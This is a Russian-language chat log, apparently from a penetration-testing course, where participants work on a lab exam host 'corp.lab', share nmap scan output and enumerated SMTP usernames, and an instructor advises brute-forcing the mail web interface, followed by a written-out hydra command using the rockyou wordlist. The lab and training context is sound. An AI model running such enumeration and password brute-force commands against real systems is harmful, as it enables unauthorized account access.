k
нет, но что тогда делать с едиснтвенной доступной информацией - дофига user'name? На порту 8100 у них висит почтовый клиент
Там дирлистинг на вэбморде
Size: a a a
2018 September 17
M
Здесь вконце статьи парень делает тоже самое
M
Я прошёлся сканерами по всем вебам на 80ом и 8100, ничего нет
ß
Скинь их лучше сюда @hacker_course
Окей
Если че линки брошу, там некоторые по 12 гигов и больше весят
Если че линки брошу, там некоторые по 12 гигов и больше весят
M
Окей, зальем
k
Вот же
k
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
| ssh-hostkey:
| 1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
| 2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
|_ 256 2c:58:fd:06:ea:46:8e:f7:b5:28:58:58:06:fa:dc:38 (ECDSA)
25/tcp open smtp CommuniGate Pro mail server 6.2.6
|_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection timeout
80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Main site
8100/tcp open http CommuniGate Pro httpd 6.2.6
| http-methods:
|_ Potentially risky methods: PUT DELETE LOCK UNLOCK MKCOL PROPFIND PROPPATCH MOVE COPY REPORT SEARCH ACL MKCALENDAR
|_http-server-header: CommuniGatePro/6.2.6
|_http-svn-info: ERROR: Script execution failed (use -d to debug)
|_http-title: CommuniGate Pro corp.lab Entrance
| http-webdav-scan:
| Public Options: OPTIONS, GET, HEAD, POST, PUT, DELETE, LOCK, UNLOCK, MKCOL, PROPFIND, PROPPATCH, MOVE, COPY, REPORT, SEARCH, ACL, MKCALENDAR
| WebDAV type: Unkown
| Server Type: CommuniGatePro/6.2.6
| Server Date: Mon, 17 Sep 2018 08:25:56 GMT
| Allowed Methods: OPTIONS, GET, HEAD, POST, PUT, DELETE, LOCK, UNLOCK, MKCOL, PROPFIND, PROPPATCH, MOVE, COPY, REPORT, SEARCH, ACL, MKCALENDAR
| Directory Listing:
| /
| /CalDAV/
| /CalDAV/INBOX/
| /CalDAV/Outbox/
| /WebDAV/private/caldav/
|_ /CalDAV/Notify/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 - 3.1 (91%), OpenWrt 12.09-rc1 Attitude Adjustment (Linux 3.3 - 3.7) (91%), Linux 3.11 (91%), Linux 3.2 (91%), Linux 3.2 - 3.10 (91%), Linux 3.2 - 3.16 (91%), Linux 3.2 - 3.8 (91%), Linux 3.5 (91%), Linux 3.8 (91%), Olivetti 65C-9 printer (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: Host: corp.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel
k
Или это не тот сервант?
M
тот
M
он требует авторизоваться чтобы по дирам перейти\
M
M
M
M
да да
M
окей
M
Здравствуйте, приступив к экзамену обнаружились пользователи:
25/tcp open smtp
| smtp-enum-users:
| root
| admin
| administrator
| webadmin
| sysadmin
| netadmin
| guest
| user
| web
|_ test
Их нужно пробрутить? Подойдет словарь john the riper?
[Михаил]
Добрый день пользователи есть на сайте в разделе контакты
[Михаил]
советую брутить по 8100
25/tcp open smtp
| smtp-enum-users:
| root
| admin
| administrator
| webadmin
| sysadmin
| netadmin
| guest
| user
| web
|_ test
Их нужно пробрутить? Подойдет словарь john the riper?
[Михаил]
Добрый день пользователи есть на сайте в разделе контакты
[Михаил]
советую брутить по 8100
M
🤦🏻♂️
M
hydra -f -L '/root/Desktop/user_ex.txt' -P '/root/Downloads/rockyou.txt' smtp://192.168.100.111 -e ns -t 64 -s 8100
a.fox
m.sopov
b.trokin
e.vasilyev
A. Fox
email: a.fox@corp.lab
не помню..@corp.lab опускается?
M
окей